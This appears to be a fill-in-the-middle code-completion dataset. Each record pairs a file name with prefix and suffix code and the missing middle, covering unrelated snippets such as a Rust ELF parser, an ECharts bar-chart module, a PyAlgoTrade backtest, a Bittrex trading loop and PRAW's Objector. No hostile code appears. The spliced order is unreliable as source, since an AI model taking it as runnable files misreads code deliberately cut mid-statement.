e_phentsize:u8_to_u16(&file[0x2A..0x2C]),
e_phnum:u8_to_u16(&file[0x2C..0x2E]),
e_shentsize:u8_to_u16(&file[0x2E..0x30]),
e_shnum:u8_to_u16(&file[0x30..0x32]),
e_shstrndx:u8_to_u16(&file[0x32..0x34]),
}
}
pub fn get_e_shoff(&self)->u32{
self.e_shoff
}
pub fn get_e_shentsize(&self)->u16{
self.e_shentsize
}
pub fn get_e_shnum(&self)->u16{
self.e_shnum
}
pub fn | (&self)->u32{
self.e_entry
}
}
#[derive(Clone, Debug)]
struct ElfIdent{
ei_mag:u32,
ei_class:u8,
ei_data:u8,
ei_version:u8,
ei_osabi:u8,
ei_abiversion:u8,
}
impl ElfIdent{
pub fn new(ei:&[u8])->ElfIdent{
ElfIdent{
ei_mag:u8_to_u32(&ei[0..4]),
ei_class:ei[4],
ei_data:ei[5],
ei_version:ei[6],
ei_osabi:ei[7],
ei_abiversion:ei[8],
}
}
} | get_e_entry |
transer.js | /** 立体柱状图
* 支持的配置:
* barWidth:number,柱状图宽度,0~1
* barGap:number,柱状图系列间隔 0~1
* stack:bool,开启堆叠模式
* countStart: function(params, api, wSize, value), 自定义柱子定位点计算函数
* label:object , 柱子顶部label
* layout:string, 设置为y时柱子会横向放置,y轴会成为名称轴,x轴为数值轴
* barMinHeight:number/function(height, seriesIndex, dataIndex),柱子最小高度,为function时返回值将作为柱子最终高度
* barMaxWidth: number, 柱子最大宽度
* beforeRender: function(option), echarts渲染前触发,可调整生成的option
*/
import renderBarItem from "./renderitem";
import getAxis from "./axis";
import { customBarLabel } from "./label";
import themeDict from "./theme";
import utils from "./util";
function countRange(data, stack) {
var sum = [];
let max, min;
data.forEach((s, i) => {
let theMax = Math.max.apply(null, s.value);
let theMin = Math.min.apply(null, s.value);
if ((!max && max !== 0) || theMax > max) {
max = theMax;
}
if ((!min && min !== 0) || theMin < min) {
min = theMin;
}
s.value.forEach(function(item, j) {
sum[j] = sum[j] || 0;
sum[j] += item;
});
});
max = stack ? Math.max.apply(null, sum) : max;
min = stack ? Math.min.apply(null, sum) : min;
return { max, min };
}
function transer(settings, context) {
let {
dataSource: data,
theme,
barWidth,
barMaxWidth,
barGap,
stack,
countStart,
layout,
maxScale,
valueAxisMax,
valueAxisMin,
barMinHeight,
baseShapeControl,
stand = false,
halo = false,
eccentricity = 0.36,
attachItems,
} = settings;
let stackData = {};
let makeHaloItems = (x, y, r, themeItem, myEccentricity) => {
return {
type: "circle",
shape: {
cx: x,
cy: y,
r: r,
},
origin: [x, y],
scale:
layout !== "y"
? [1, myEccentricity || eccentricity]
: [myEccentricity || eccentricity, 1],
style: {
stroke: themeItem.arcBorder,
lineWidth: themeItem.arcBorderWidth,
fill: "transparent",
},
z2: 10,
};
};
let labelItems = function(option) {
let { value } = option;
let items = [];
var labelItem = customBarLabel(value, settings, option);
if (labelItem && labelItem.children) {
labelItem.children.forEach((item) => (item.z2 = 10));
items.push(labelItem);
}
return items;
};
let barLayoutCount = stack || !data.data.length ? 1 : data.data.length;
barGap = barGap || 0.4 / barLayoutCount;
barWidth = barWidth || 0.6 / (barLayoutCount + 0.5);
let series = data.data.map(function(item, i) {
return {
name: item.name,
type: "custom",
itemStyle: {
normal: {
color: theme[i].color,
},
},
renderItem: renderBarItem({
countStart: function(_ref) {
var params = _ref.params,
api = _ref.api,
wSize = _ref.width,
dh = _ref.height;
if (countStart) return countStart.apply(this, arguments);
var seriesIndex = params.seriesIndex,
dataIndex = params.dataIndex;
if (dataIndex === 0 && seriesIndex === 0) {
stackData = {};
}
var stackValue = (stackData[dataIndex] = stackData[dataIndex] || {});
var countSum = function countSum() {
var sum = 0;
Object.keys(stackValue).forEach(function(key) {
if (key >= seriesIndex) return;
var item = stackValue[key] || 0;
sum += item;
});
return sum;
};
var num = data.data.length;
var pIndex = seriesIndex;
var height = countSum() || 0;
if (layout !== "y") {
var o = api.coord([dataIndex, 0]);
if (stack) {
o[1] -= height;
} else {
o[0] +=
pIndex * wSize * (1 + barGap) -
((num - 1) / 2) * wSize * (1 + barGap);
}
} else {
o = api.coord([0, dataIndex]);
if (stack) {
o[0] += height;
} else {
o[1] -=
pIndex * wSize * (1 + barGap) -
((num - 1) / 2) * wSize * (1 + barGap);
}
}
stackValue[seriesIndex] = dh;
return o;
},
barWidth: barWidth || 0.25,
barMaxWidth,
layout: layout,
barMinHeight: barMinHeight,
baseShapeControl: baseShapeControl,
eccentricity,
context,
style: (params, witch) => {
let themeItem;
if (typeof theme == "function") {
themeItem = theme(params, witch);
} else {
themeItem = theme[params.seriesIndex];
}
if (!themeItem) {
return null;
}
if (witch == "arc") {
return {
fill: themeItem.arcColor,
stroke: themeItem.arcBorder,
lineWidth: themeItem.arcBorderWidth,
};
} else {
return {
fill: themeItem.color,
stroke: "transparent",
lineWidth: 0,
};
}
},
attach({ params, o, width, height }) {
let { seriesIndex } = params;
let items = [];
let isStand = () => {
if (stack) return seriesIndex === 0;
return true;
};
let themeItem = theme[seriesIndex];
if (stand && isStand()) {
let item = makeHaloItems(
o[0],
o[1],
width * 0.65,
themeItem,
eccentricity * 1.35
);
item.z2 = -1;
Object.assign(item.style, {
lineWidth: themeItem.arcBorderWidth * 1.5,
});
items.push(item);
let standFillItem = {
type: "arc",
shape: {
cx: o[0],
cy: o[1],
r: width * 0.7,
r0: width / 2,
},
origin: o,
scale:
layout !== "y"
? [1, eccentricity * 1.35]
: [eccentricity * 1.35, 1],
style: {
stroke: "transparent",
fill: themeItem.standFill,
},
z2: -1,
};
items.push(standFillItem);
let standShadowItem = {
type: "arc",
shape: {
cx: o[0],
cy: o[1],
r: width * 1.2,
r0: width * 0.7,
},
origin: o,
scale:
layout !== "y"
? [1, eccentricity * 1.35]
: [eccentricity * 1.35, 1],
style: {
stroke: "transparent",
fill: themeItem.standShadowFill,
},
z2: -1,
};
items.push(standShadowItem);
}
if (halo && isStand()) {
let dh = halo.threshold || 30;
o = o.concat([]);
if (height > dh) {
let ox = o[0],
oy = o[1];
if (layout == "y") {
ox += dh;
} else {
oy -= dh;
}
items.push(makeHaloItems(ox, oy, width / 2, themeItem));
items.push(makeHaloItems(ox, oy, (width * 3) / 10, themeItem));
if (layout == "y") {
ox -= width / 20;
} else {
oy += width / 20;
}
items.push(
makeHaloItems(ox, oy, (width * 2) / 10, theme[seriesIndex])
);
}
}
let labels = labelItems(arguments[0]);
items = items.concat(labels || []);
if (typeof attachItems == "function") {
items = items.concat(attachItems.apply(this, arguments));
}
return items;
},
}),
dimensions: ["from", "to", "profit"],
data: item.value,
};
});
var option = {
grid: {
containLabel: true
},
series: series,
};
let axisOption = getAxis(data.name, settings);
let valueRange = countRange(data.data, stack);
let axisMax = null,
axisMin = null,
maxHeight = valueRange.max,
minHeight = valueRange.min < 0 ? valueRange.min : 0;
if (stack) {
axisMax = maxHeight * (maxScale || 1.1);
axisMin = minHeight * (maxScale || 1.1);
if (axisMax > 10) {
axisMax = Math.round(axisMax);
} else if (axisMax > 1 && axisMax < 10) {
axisMax = Math.round(axisMax * 100) / 100;
}
if (axisMin < -10) {
axisMin = Math.round(axisMin);
} else if (axisMax > -10 && axisMax < 1) {
axisMin = Math.round(axisMin * 100) / 100;
}
}
if (valueAxisMax) {
axisMax =
typeof valueAxisMax == "function" | : valueAxisMax;
}
if (valueAxisMin) {
axisMin =
typeof valueAxisMin == "function"
? valueAxisMin(minHeight)
: valueAxisMin;
}
if (axisMax && axisMax > 0) {
axisOption[layout == "y" ? "xAxis" : "yAxis"][0].max = axisMax;
}
if (axisMin && axisMin < 0) {
axisOption[layout == "y" ? "xAxis" : "yAxis"][0].min = axisMin;
}
option = Object.assign({}, axisOption, option);
return option;
}
export { renderBarItem };
export default function(target, settings) {
let { option={},title, tooltip, theme, beforeRender, ...chartSettings} = settings;
option.tooltip = Object.assign(option.tooltip||{}, tooltip||{});
option.title = Object.assign(option.title||{}, typeof title=='object'?title:{text: title||''});
let themes = theme?theme.map(item=>themeDict[item]||item):[];
if(!themes.length){
themes = Object.keys(themeDict).map(item=>themeDict[item]);
}
chartSettings.theme = themes;
let chart = target;
let chartOption = transer(chartSettings, chart);
if(!chart) {
return chartOption;
}
let optionResult = utils.extend(chartOption, option);
console.log(optionResult);
beforeRender && beforeRender(chartOption, optionResult);
chart.setOption(optionResult);
return chart;
} | ? valueAxisMax(maxHeight) |
assert.go | package assert
import "testing"
func Nil(err error, t *testing.T, msgs ...string) {
if err != nil {
t.Fatal(msgs, "error:", err)
}
}
func | (v bool, t *testing.T, msgs ...string) {
if !v {
t.Fatal(msgs)
}
}
func False(v bool, t *testing.T, msgs ...string) {
True(!v, t, msgs...)
}
func Err(err error, t *testing.T, msgs ...string) {
if err == nil {
t.Fatal(msgs, "error:", err)
}
}
| True |
index.test.tsx | import React from 'react'
import { render } from '@testing-library/react'
import CopyLight from './index'
test('<CopyLight /> should render', () => { | const screen = render(<CopyLight />)
expect(screen.getByText(/Created by/)).toBeInTheDocument()
}) |
|
p_var.py | class car:
__topspeed = 0
__name=""
def __init__(self):
self.__topspeed=250
self.name="SAM"
def drive(self):
print("Drive Top Speed=" +str(self.__topspeed))
def setTopSpeed(self,speed):
|
volvo=car()
volvo.drive()
volvo.setTopSpeed(380)
volvo.drive() | self.__topspeed=speed |
Ibex2010Sma.py | # PyAlgoSamples
# Examples using the PyAlgoTrade Library
#
# Copyright 2015-2017 Isaac de la Pena
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Isaac de la Pena <[email protected]>
"""
from pyalgotrade import strategy, plotter
from pyalgotrade.barfeed import yahoofeed
from pyalgotrade.technical import ma
from pyalgotrade.stratanalyzer import drawdown, returns, sharpe, trades
from pyalgotrade.utils import stats
from pyalgoext import volatility
import Ibex2010Assets as assets
import pyalgotrade.logger as logger
import math
import os
class MyBenchmark(strategy.BacktestingStrategy):
def __init__(self, feed, instruments, posMax, delay):
strategy.BacktestingStrategy.__init__(self, feed, 1000000)
self._delay = delay
self._liquidity = 0.05
self._positions = {}
self._posMax = posMax
self._instruments = instruments
self.setUseAdjustedValues(True)
self.getBroker().getFillStrategy().setVolumeLimit(None)
self.startDateTime = feed.peekDateTime() |
def onEnterCanceled(self, position):
del self._positions[position.getInstrument()]
self.logOp("COMPRA CANCELADA", position.getEntryOrder())
def onExitOk(self, position):
del self._positions[position.getInstrument()]
self.logOp("VENTA", position.getExitOrder())
def onExitCanceled(self, position):
# If the exit was canceled, re-submit it.
position.exitMarket()
self.logOp("VENTA CANCELADA", position.getExitOrder())
def onBars(self, bars):
# Wait for the same bar than the strategy
if self._delay > 0:
self._delay -= 1
return
for instrument in self._instruments:
if instrument in bars:
if instrument not in self._positions:
if len(self._positions) < self._posMax:
self.prepareLong(instrument, bars)
def prepareLong(self, instrument, bars):
bar = bars[instrument]
perInstrument = self.getBroker().getEquity() / self._posMax
cash = self.getBroker().getCash()
if perInstrument > cash:
perInstrument = cash
perInstrument *= (1 - self._liquidity)
amount = int(perInstrument / bar.getPrice())
if amount > 0:
self._positions[instrument] = self.enterLong(instrument, amount, True)
def onFinish(self, bars):
self.endDateTime = bars.getDateTime()
def logOp(self, type, order):
self.info("[%s] %s %s %s" % (len(self._positions), type, order.getInstrument(), order.getExecutionInfo()))
class MyStrategy(MyBenchmark):
def __init__(self, feed, instruments, posMax, smaShort, smaLong):
MyBenchmark.__init__(self, feed, instruments, posMax, smaLong)
self._smaShort = {}
self._smaLong = {}
for instrument in instruments:
self._smaShort[instrument] = ma.SMA(feed[instrument].getPriceDataSeries(), smaShort)
self._smaLong[instrument] = ma.SMA(feed[instrument].getPriceDataSeries(), smaLong)
def getSMAShorts(self):
return self._smaShort
def getSMALongs(self):
return self._smaLong
def onBars(self, bars):
for instrument in self._instruments:
# Wait for enough bars to be available to calculate a SMA.
if not self._smaLong[instrument] or self._smaLong[instrument][-1] is None:
return
if instrument in bars:
# If a position was not opened, check if we should enter a long position.
if instrument not in self._positions:
if len(self._positions) < self._posMax:
if self._smaShort[instrument][-1] > self._smaLong[instrument][-1]:
self.prepareLong(instrument, bars)
# Check if we have to exit the position.
elif self._smaShort[instrument][-1] < self._smaLong[instrument][-1]:
if not self._positions[instrument].exitActive():
self._positions[instrument].exitMarket()
def run_strategy(isBenchmark, instruments, posMax, smaShort, smaLong):
# Load the yahoo feed from the CSV file
feed = yahoofeed.Feed()
feed.sanitizeBars(True)
for instrument, startYear in instruments.items():
for year in range(startYear, assets.endYear):
if os.path.isfile(assets.folder + instrument + "-" + str(year) + ".csv"):
feed.addBarsFromCSV(instrument, assets.folder + instrument + "-" + str(year) + ".csv")
if isBenchmark:
myStrategy = MyBenchmark(feed, instruments, posMax, smaLong)
else:
myStrategy = MyStrategy(feed, instruments, posMax, smaShort, smaLong)
# Attach analyzers to the strategy.
# Returns first in case others use it (DataSeries)
returnsAnalyzer = returns.Returns()
myStrategy.attachAnalyzer(returnsAnalyzer)
returnsAnalyzer.getReturns().setMaxLen(1000000)
sharpeAnalyzer = sharpe.SharpeRatio()
myStrategy.attachAnalyzer(sharpeAnalyzer)
drawDownAnalyzer = drawdown.DrawDown()
myStrategy.attachAnalyzer(drawDownAnalyzer)
tradesAnalyzer = trades.Trades()
myStrategy.attachAnalyzer(tradesAnalyzer)
volaAnalyzer = volatility.VolaAnalyzer(120)
myStrategy.attachAnalyzer(volaAnalyzer)
# Attach a plotter to the strategy
plt = plotter.StrategyPlotter(myStrategy, False)
volaSeries = volaAnalyzer.getVolaSeries()
plt.getOrCreateSubplot("Volatility").addDataSeries("Volatility", volaSeries)
capStart = myStrategy.getBroker().getEquity()
myStrategy.info("CAPITAL INICIAL: $%.4f" % capStart)
# Run the strategy
myStrategy.run()
# Show basic information
allRet = returnsAnalyzer.getReturns()
capEnd = myStrategy.getBroker().getEquity()
myStrategy.info("CAPITAL FINAL: $%.4f" % capEnd)
myStrategy.info(" ")
myStrategy.info("Rentabilidad: %.4f%%" % (100 * (capEnd - capStart) / capStart))
myStrategy.info("Rentabilidad Anualizada: %.4f%%" % (100 * (math.pow((capEnd / capStart),(365.0 / ((myStrategy.endDateTime - myStrategy.startDateTime).days))) - 1)))
myStrategy.info("Volatilidad Anualizada: %.4f%%" % (100 * stats.stddev(allRet, 1) * math.sqrt(252)))
myStrategy.info("Ratio de Sharpe Anualizado: %.4f" % (100 * sharpeAnalyzer.getSharpeRatio(0.0036, True)))
myStrategy.info("DrawDown Maximo: %.4f%%" % (100 * drawDownAnalyzer.getMaxDrawDown()))
myStrategy.info("DrawDown Mas Largo: %s dias" % (drawDownAnalyzer.getLongestDrawDownDuration().days))
myStrategy.info(" ")
myStrategy.info("Rentabilidad Media: %.4f%%" % (100 * stats.mean(allRet)))
posRet = []
negRet = []
allRet = returnsAnalyzer.getReturns()
for ret in allRet:
if ret > 0:
posRet.append(ret)
elif ret < 0:
negRet.append(ret)
myStrategy.info("Ganancia Media: %.4f%%" % (100 * stats.mean(posRet)))
myStrategy.info("Perdida Media: %.4f%%" % (100 * stats.mean(negRet)))
myStrategy.info(" ")
myStrategy.info("Ganancia Media por Op: $%s" % (stats.mean(tradesAnalyzer.getProfits())))
myStrategy.info("Perdida Media por Op: $%s" % (stats.mean(tradesAnalyzer.getLosses())))
myStrategy.info("Comisiones Totales: $%s" % (sum(tradesAnalyzer.getCommissionsForAllTrades())))
myStrategy.info("Num Ops Igual: %s" % (tradesAnalyzer.getEvenCount()))
myStrategy.info("Num Ops Gano: %s" % (tradesAnalyzer.getProfitableCount()))
myStrategy.info("Num Ops Pierdo: %s" % (tradesAnalyzer.getUnprofitableCount()))
# Plot the strategy.
plt.plot()
logger.log_format = "[%(levelname)s] %(message)s"
smaShort = 50
smaLong = 200
# Benchmark
#run_strategy(True, assets.indices, 1, smaShort, smaLong)
# Strategy
run_strategy(False, assets.instruments, 32, smaShort, smaLong) | self.endDateTime = None
def onEnterOk(self, position):
self.logOp("COMPRA", position.getEntryOrder()) |
main.go | /*
A presentation of the tview package, implemented with tview.
Navigation
The presentation will advance to the next slide when the primitive demonstrated
in the current slide is left (usually by hitting Enter or Escape). Additionally,
the following shortcuts can be used:
- Ctrl-N: Jump to next slide
- Ctrl-P: Jump to previous slide
*/
package main
import (
"fmt"
"strconv"
"github.com/gdamore/tcell"
"github.com/rivo/tview"
)
// Slide is a function which returns the slide's main primitive and its title.
// It receives a "nextSlide" function which can be called to advance the
// presentation to the next slide.
type Slide func(nextSlide func()) (title string, content tview.Primitive)
// The application.
var app = tview.NewApplication()
// Starting point for the presentation.
func main() | {
// The presentation slides.
slides := []Slide{
Cover,
Introduction,
HelloWorld,
InputField,
Form,
TextView1,
TextView2,
Table,
TreeView,
Flex,
Grid,
Colors,
End,
}
// The bottom row has some info on where we are.
info := tview.NewTextView().
SetDynamicColors(true).
SetRegions(true).
SetWrap(false)
// Create the pages for all slides.
currentSlide := 0
info.Highlight(strconv.Itoa(currentSlide))
pages := tview.NewPages()
previousSlide := func() {
currentSlide = (currentSlide - 1 + len(slides)) % len(slides)
info.Highlight(strconv.Itoa(currentSlide)).
ScrollToHighlight()
pages.SwitchToPage(strconv.Itoa(currentSlide))
}
nextSlide := func() {
currentSlide = (currentSlide + 1) % len(slides)
info.Highlight(strconv.Itoa(currentSlide)).
ScrollToHighlight()
pages.SwitchToPage(strconv.Itoa(currentSlide))
}
for index, slide := range slides {
title, primitive := slide(nextSlide)
pages.AddPage(strconv.Itoa(index), primitive, true, index == currentSlide)
fmt.Fprintf(info, `%d ["%d"][darkcyan]%s[white][""] `, index+1, index, title)
}
// Create the main layout.
layout := tview.NewFlex().
SetDirection(tview.FlexRow).
AddItem(pages, 0, 1, true).
AddItem(info, 1, 1, false)
// Shortcuts to navigate the slides.
app.SetInputCapture(func(event *tcell.EventKey) *tcell.EventKey {
if event.Key() == tcell.KeyCtrlN {
nextSlide()
} else if event.Key() == tcell.KeyCtrlP {
previousSlide()
}
return event
})
app.EnableMouse()
// Start the application.
if err := app.SetRoot(layout, true).Run(); err != nil {
panic(err)
}
} |
|
TradingAlgorythm.py | import json
from datetime import datetime, timedelta
from bittrex.bittrex import Bittrex
def TradingAlorythm(command, market, amount, coinname, step, stoploss, key, secret):
| TestTrading = Bittrex(key, secret)
period = timedelta(seconds=20)
next_tick = datetime.now() + period
seconds = 20
firstCycle = True
if command == "y":
print("buying {0} of {1} coins".format(amount, coinname))
# раскомментировать для созадния ордера на покупку
# TestTrading.buy_limit(market, amount, coinprice)
while command == "y":
# таймер каждые 20 секунд
if next_tick <= datetime.now():
print("Connecting to Bittrex")
seconds += 20
next_tick += period
print("Timer ticked")
print("Updating stock exchange...")
# Считываем значения курса
t = TestTrading.get_ticker(market)
# Запрашиваем баланс
balance = TestTrading.get_balance(coinname)
# Запрашиваем текущие ордера
orders = TestTrading.get_open_orders(market)
a = json.dumps(t)
# Печатаем значения курса
print(t)
# Печатаем баланс
print("Balance is {} ".format(balance['result']['Available']))
# Печатаем ордера
print(orders)
# Раскладываем по переменным
bid = t['result']['Bid']
ask = t['result']['Ask']
last = t['result']['Last']
if firstCycle:
StartValue = bid
firstCycle = False
Stop_loss = StartValue - 0.00000007
print("*--------------------------")
print("| Start Value | {: .8f} ".format(StartValue))
print("| Stop loss | {: .8f} ".format(Stop_loss))
print("|--------------------------")
print("| Bid | {: .8f} ".format(bid))
print("| Ask | {: .8f} ".format(ask))
print("| Last | {: .8f} ".format(last))
print("*--------------------------")
# Добавляем Bid в конец массива
# A.append(float(bid))
if bid >= step + StartValue:
print("MOVE STOP-LOSS")
StartValue = bid
if bid <= stoploss:
print("Sell order sent") |
|
test_admin.py | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
"""A funcion that executes before all tests"""
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email='[email protected]',
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='[email protected]',
password='password123',
name='Test user full name'
)
def test_users_listed(self):
"""Test that users are listed on user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def | (self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| test_create_user_page |
objector.py | """Provides the Objector class."""
from json import loads
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Union
from .exceptions import ClientException, RedditAPIException
from .models.reddit.base import RedditBase
from .util import snake_case_keys
if TYPE_CHECKING: # pragma: no cover
from ... import praw
class Objector:
"""The objector builds :class:`.RedditBase` objects."""
@classmethod
def parse_error(
cls, data: Union[List[Any], Dict[str, Dict[str, str]]]
) -> Optional[RedditAPIException]:
"""Convert JSON response into an error object.
:param data: The dict to be converted.
:returns: An instance of :class:`~.RedditAPIException`, or ``None`` if ``data``
doesn't fit this model.
"""
if isinstance(data, list):
# Fetching a Submission returns a list (of two items). Although it's handled
# manually in `Submission._fetch()`, assume it's a possibility here.
return None
errors = data.get("json", {}).get("errors")
if errors is None:
return None
if len(errors) < 1:
# See `Collection._fetch()`.
raise ClientException("successful error response", data)
return RedditAPIException(errors)
@classmethod
def check_error(cls, data: Union[List[Any], Dict[str, Dict[str, str]]]):
"""Raise an error if the argument resolves to an error object."""
error = cls.parse_error(data)
if error:
raise error
def | (self, reddit: "praw.Reddit", parsers: Optional[Dict[str, Any]] = None):
"""Initialize an Objector instance.
:param reddit: An instance of :class:`~.Reddit`.
"""
self.parsers = {} if parsers is None else parsers
self._reddit = reddit
def _objectify_dict(self, data):
"""Create RedditBase objects from dicts.
:param data: The structured data, assumed to be a dict.
:returns: An instance of :class:`~.RedditBase`.
"""
if {"conversation", "messages", "modActions"}.issubset(data):
parser = self.parsers["ModmailConversation"]
elif {"actionTypeId", "author", "date"}.issubset(data):
# Modmail mod action
data = snake_case_keys(data)
parser = self.parsers["ModmailAction"]
elif {"bodyMarkdown", "isInternal"}.issubset(data):
# Modmail message
data = snake_case_keys(data)
parser = self.parsers["ModmailMessage"]
elif {"kind", "short_name", "violation_reason"}.issubset(data):
# This is a Rule
parser = self.parsers["rule"]
elif {"isAdmin", "isDeleted"}.issubset(data):
# Modmail author
data = snake_case_keys(data)
# Prevent clobbering base-36 id
del data["id"]
data["is_subreddit_mod"] = data.pop("is_mod")
parser = self.parsers[self._reddit.config.kinds["redditor"]]
elif {"banStatus", "muteStatus", "recentComments"}.issubset(data):
# Modmail user
data = snake_case_keys(data)
data["created_string"] = data.pop("created")
parser = self.parsers[self._reddit.config.kinds["redditor"]]
elif {"displayName", "id", "type"}.issubset(data):
# Modmail subreddit
data = snake_case_keys(data)
parser = self.parsers[self._reddit.config.kinds[data["type"]]]
elif {"date", "id", "name"}.issubset(data) or {
"id",
"name",
"permissions",
}.issubset(data):
parser = self.parsers[self._reddit.config.kinds["redditor"]]
elif {"text", "url"}.issubset(data):
if "color" in data or "linkUrl" in data:
parser = self.parsers["Button"]
else:
parser = self.parsers["MenuLink"]
elif {"children", "text"}.issubset(data):
parser = self.parsers["Submenu"]
elif {"height", "url", "width"}.issubset(data):
parser = self.parsers["Image"]
elif {"isSubscribed", "name", "subscribers"}.issubset(data):
# discards icon and subscribed information
return self._reddit.subreddit(data["name"])
elif {"authorFlairType", "name"}.issubset(data):
# discards flair information
return self._reddit.redditor(data["name"])
elif {"parent_id"}.issubset(data):
parser = self.parsers[self._reddit.config.kinds["comment"]]
elif "collection_id" in data.keys():
parser = self.parsers["Collection"]
elif {"moderators", "moderatorIds", "allUsersLoaded", "subredditId"}.issubset(
data
):
data = snake_case_keys(data)
moderators = []
for mod_id in data["moderator_ids"]:
mod = snake_case_keys(data["moderators"][mod_id])
mod["mod_permissions"] = list(mod["mod_permissions"].keys())
moderators.append(mod)
data["moderators"] = moderators
parser = self.parsers["moderator-list"]
elif "username" in data.keys():
data["name"] = data.pop("username")
parser = self.parsers[self._reddit.config.kinds["redditor"]]
else:
if "user" in data:
parser = self.parsers[self._reddit.config.kinds["redditor"]]
data["user"] = parser.parse({"name": data["user"]}, self._reddit)
return data
return parser.parse(data, self._reddit)
def objectify(
self, data: Optional[Union[Dict[str, Any], List[Any]]]
) -> Optional[Union[RedditBase, Dict[str, Any], List[Any]]]:
"""Create RedditBase objects from data.
:param data: The structured data.
:returns: An instance of :class:`~.RedditBase`, or ``None`` if given ``data`` is
``None``.
"""
# pylint: disable=too-many-return-statements
if data is None: # 204 no content
return None
if isinstance(data, list):
return [self.objectify(item) for item in data]
if "json" in data and "errors" in data["json"]:
errors = data["json"]["errors"]
if len(errors) > 0:
raise RedditAPIException(errors)
if "kind" in data and (
"shortName" in data or data["kind"] in ("menu", "moderators")
):
# This is a widget
parser = self.parsers.get(data["kind"], self.parsers["widget"])
return parser.parse(data, self._reddit)
if {"kind", "data"}.issubset(data) and data["kind"] in self.parsers:
parser = self.parsers[data["kind"]]
return parser.parse(data["data"], self._reddit)
if "json" in data and "data" in data["json"]:
if "websocket_url" in data["json"]["data"]:
return data
if "things" in data["json"]["data"]: # Submission.reply
return self.objectify(data["json"]["data"]["things"])
if "rules" in data["json"]["data"]:
return self.objectify(loads(data["json"]["data"]["rules"]))
if "url" in data["json"]["data"]: # Subreddit.submit
# The URL is the URL to the submission, so it's removed.
del data["json"]["data"]["url"]
parser = self.parsers[self._reddit.config.kinds["submission"]]
if data["json"]["data"]["id"].startswith(
f"{self._reddit.config.kinds['submission']}_"
):
# With polls, Reddit returns a fullname but calls it an "id". This
# fixes this by coercing the fullname into an id.
data["json"]["data"]["id"] = data["json"]["data"]["id"].split(
"_", 1
)[1]
else:
parser = self.parsers["LiveUpdateEvent"]
return parser.parse(data["json"]["data"], self._reddit)
if "rules" in data:
return self.objectify(data["rules"])
elif isinstance(data, dict):
return self._objectify_dict(data)
return data
| __init__ |
06-update-sysctl.py | #!/usr/bin/env python3
import logging
import sys
import subprocess
from taupage import configure_logging, get_config
def main():
|
if __name__ == '__main__':
main()
| """Configure custom sysctl parameters
If a sysctl section is present, add the valid parameters to sysctl and reloads.
"""
CUSTOM_SYSCTL_CONF = '/etc/sysctl.d/99-custom.conf'
configure_logging()
config = get_config()
sysctl = config.get('sysctl')
if sysctl is None:
sys.exit(0)
try:
sysctl_entries = ['{} = {}'.format(key, value) for key, value in sysctl.items()]
with open(CUSTOM_SYSCTL_CONF, 'w') as file:
file.write('\n'.join(sysctl_entries)+'\n')
logging.info('Successfully written sysctl parameters')
except Exception as e:
logging.error('Failed to write sysctl parameters')
logging.exception(e)
sys.exit(1)
try:
exitcode = subprocess.call(['/sbin/sysctl', '-p', CUSTOM_SYSCTL_CONF])
if exitcode != 0:
logging.error('Reloading sysctl failed with exitcode {}'.format(exitcode))
sys.exit(1)
logging.info('Successfully reloaded sysctl parameters')
except Exception as e:
logging.error('Failed to reload sysctl')
logging.exception(e)
sys.exit(1) |
refresh.go | package datastore
import (
"context"
"go.mercari.io/datastore"
)
// KindRefresh is datastore kind name of OAuth2 refresh token
const KindRefresh = "refresh"
type refresh struct {
RefreshToken string `datastore:"-"`
AccessToken string `datastore:",noindex"`
}
func newRefresh(refToken, accToken string) *refresh {
return &refresh{
RefreshToken: refToken,
AccessToken: accToken,
}
}
type refreshStorage struct {
client datastore.Client
}
func | (client datastore.Client) *refreshStorage {
return &refreshStorage{client: client}
}
func (r *refreshStorage) put(ctx context.Context, ref *refresh) error {
key := r.client.NameKey(KindRefresh, ref.RefreshToken, nil)
_, err := r.client.Put(ctx, key, ref)
return err
}
func (r *refreshStorage) get(ctx context.Context, token string) (*refresh, error) {
key := r.client.NameKey(KindRefresh, token, nil)
ref := new(refresh)
if err := r.client.Get(ctx, key, ref); err != nil {
return nil, err
}
ref.RefreshToken = token
return ref, nil
}
func (r *refreshStorage) delete(ctx context.Context, token string) error {
key := r.client.NameKey(KindRefresh, token, nil)
return r.client.Delete(ctx, key)
}
| newRefreshStorage |
predict.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import paddle
import paddle.nn.functional as F
import paddlenlp as ppnlp
from paddlenlp.data import JiebaTokenizer, Stack, Tuple, Pad, Vocab
from utils import preprocess_prediction_data
# yapf: disable
parser = argparse.ArgumentParser(__doc__)
parser.add_argument('--device', choices=['cpu', 'gpu', 'xpu'], default="gpu", help="Select which device to train model, defaults to gpu.")
parser.add_argument("--batch_size", type=int, default=1, help="Total examples' number of a batch for training.")
parser.add_argument("--vocab_path", type=str, default="./senta_word_dict.txt", help="The path to vocabulary.")
parser.add_argument('--network', choices=['bow', 'lstm', 'bilstm', 'gru', 'bigru', 'rnn', 'birnn', 'bilstm_attn', 'cnn', 'textcnn'],
default="bilstm", help="Select which network to train, defaults to bilstm.")
parser.add_argument("--params_path", type=str, default='./checkpoints/final.pdparams', help="The path of model parameter to be loaded.")
args = parser.parse_args()
